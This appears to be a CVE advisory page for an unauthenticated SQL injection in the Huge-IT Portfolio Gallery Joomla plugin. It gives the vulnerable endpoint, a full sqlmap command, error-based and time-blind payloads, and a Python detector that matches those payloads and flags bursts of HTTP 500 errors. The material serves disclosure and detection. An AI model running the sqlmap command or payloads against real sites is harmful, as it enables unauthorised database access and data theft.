CVE-2016-1000124
published 2016-10-06

CVE-2016-1000124: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

Priority: P262
CVSS 3.0: 9.8 critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: yes
EPSS: 2.55% (83.1st percentile)

Affected

1 range

Vendor    Product             Version range   Fixed in
huge-it   portfolio_gallery   (not given)     (not given)

Detection & IOCs (extracted from sources)

path: /components/com_portfoliogallery/ajax_url.php
command: sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3
command (error-based payload): page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
command (time-blind payload): page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
filename: ajax_url.php
  • Monitor POST requests to /components/com_portfoliogallery/ajax_url.php for SQL injection patterns in the 'galleryid' parameter, including OR/GROUP BY/CONCAT/FLOOR(RAND()) error-based payloads and SLEEP()-based time-blind payloads.
  • The vulnerable POST parameter is 'galleryid'; alert on values containing SQL keywords such as OR, GROUP BY, CONCAT, SLEEP, CASE WHEN in POST body to this endpoint.
  • A high rate of HTTP 500 Internal Server Error responses from /components/com_portfoliogallery/ajax_url.php may indicate active SQL injection exploitation (sqlmap generated 2715 such errors during the PoC run).
  • The exploit requires no authentication; any unauthenticated POST to ajax_url.php with the 'post' field set to 'huge_it_portfolio_gallery_ajax' should be treated as suspicious and inspected for injection payloads.
  • The file ajax_url.php is directly web-accessible outside the normal Joomla MVC dispatch path, bypassing standard Joomla access controls; restricting direct HTTP access to this file at the web-server level is an effective mitigation.
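As an added, defender-side example (not code from the page, from cbcvebase, or from the Huge-IT project), the script below applies the detection notes above to a batch of request records: it flags any POST to ajax_url.php whose 'galleryid' value is not a plain integer or contains the OR / GROUP BY / CONCAT / FLOOR(RAND()) / SLEEP / CASE WHEN shapes, and it reports sources whose HTTP 500 count on that endpoint crosses a threshold. It assumes a JSON-style request log that records POST bodies (ordinary web-server access logs do not; a WAF or application audit log would), and the record schema, IP addresses and benign request are constructed for the demo. The two injection bodies are the payloads already quoted in the IOC list.

```python
import json
import re
from collections import Counter
from urllib.parse import parse_qs

# Endpoint and action named in the page's IOC list.
ENDPOINT = "/components/com_portfoliogallery/ajax_url.php"
AJAX_ACTION = "huge_it_portfolio_gallery_ajax"

# Payload shapes the detection notes call out: error-based (OR / GROUP BY / CONCAT /
# FLOOR(RAND())) and time-blind (SLEEP / CASE WHEN). Case-insensitive, word-bounded.
SQLI_PATTERNS = {
    "or": re.compile(r"\bOR\b", re.I),
    "group_by": re.compile(r"\bGROUP\s+BY\b", re.I),
    "concat": re.compile(r"\bCONCAT\s*\(", re.I),
    "floor_rand": re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I),
    "sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "case_when": re.compile(r"\bCASE\s+WHEN\b", re.I),
}
INTEGER = re.compile(r"-?\d+")


def inspect_post(path, body):
    """Return the reasons a POST body looks like an injection attempt ([] if clean).

    `body` is the raw application/x-www-form-urlencoded request body; parse_qs
    percent-decodes it, so encoded payloads are inspected in decoded form.
    """
    if path != ENDPOINT:
        return []
    params = parse_qs(body, keep_blank_values=True)
    galleryid = params.get("galleryid", [""])[0]
    reasons = []
    # galleryid identifies a gallery: anything other than a plain integer is suspicious.
    if not INTEGER.fullmatch(galleryid):
        reasons.append("galleryid_not_integer")
    for name, pattern in SQLI_PATTERNS.items():
        if pattern.search(galleryid):
            reasons.append("galleryid_" + name)
    return reasons


def scan(records, error_threshold=50):
    """Apply both detections to a batch of request records.

    Each record is a dict with src, method, path, status, body (assumed log schema).
    Returns per-request alerts plus the sources whose HTTP 500 count on the endpoint
    reached error_threshold (the 'high rate of 500s' indicator from the notes).
    """
    request_alerts = []
    errors_by_src = Counter()
    for rec in records:
        if rec.get("method") != "POST" or rec.get("path") != ENDPOINT:
            continue
        reasons = inspect_post(rec["path"], rec.get("body", ""))
        if reasons:
            request_alerts.append({"src": rec["src"], "reasons": reasons})
        if rec.get("status") == 500:
            errors_by_src[rec["src"]] += 1
    bursts = sorted(src for src, n in errors_by_src.items() if n >= error_threshold)
    return {"request_alerts": request_alerts, "error_burst_sources": bursts}


# Constructed sample records. The two injection bodies are the payloads quoted in the
# IOC list above; the benign body, IP addresses and log schema are made up for the demo.
BENIGN_BODY = "page=1&galleryid=3&post=" + AJAX_ACTION + "&perpage=20&linkbutton=2"
INJECTION_BODIES = [
    "page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883)"
    " THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#"
    "&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2",
    "page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)"
    "&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2",
]


def make_record(src, status, body, path=ENDPOINT):
    return {"src": src, "method": "POST", "path": path, "status": status, "body": body}


SAMPLE_LOG = (
    [make_record("203.0.113.7", 200, BENIGN_BODY),
     # same payload against another path is out of scope for this rule
     make_record("203.0.113.7", 200, INJECTION_BODIES[1], path="/index.php")]
    + [make_record("198.51.100.9", 500, INJECTION_BODIES[0]) for _ in range(12)]
    + [make_record("198.51.100.9", 200, INJECTION_BODIES[1])]
)

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_LOG, error_threshold=10), indent=2))
```

The integer check is the more durable of the two: keyword lists can be evaded by encoding or comment tricks, whereas a gallery id that is not a number is wrong regardless of how it was obfuscated. The 500-count threshold is a tuning knob; the PoC run quoted above produced thousands of 500s, so a low threshold per source over a short window is reasonable for this endpoint.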

CVSS provenance

NVD, CVSS v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)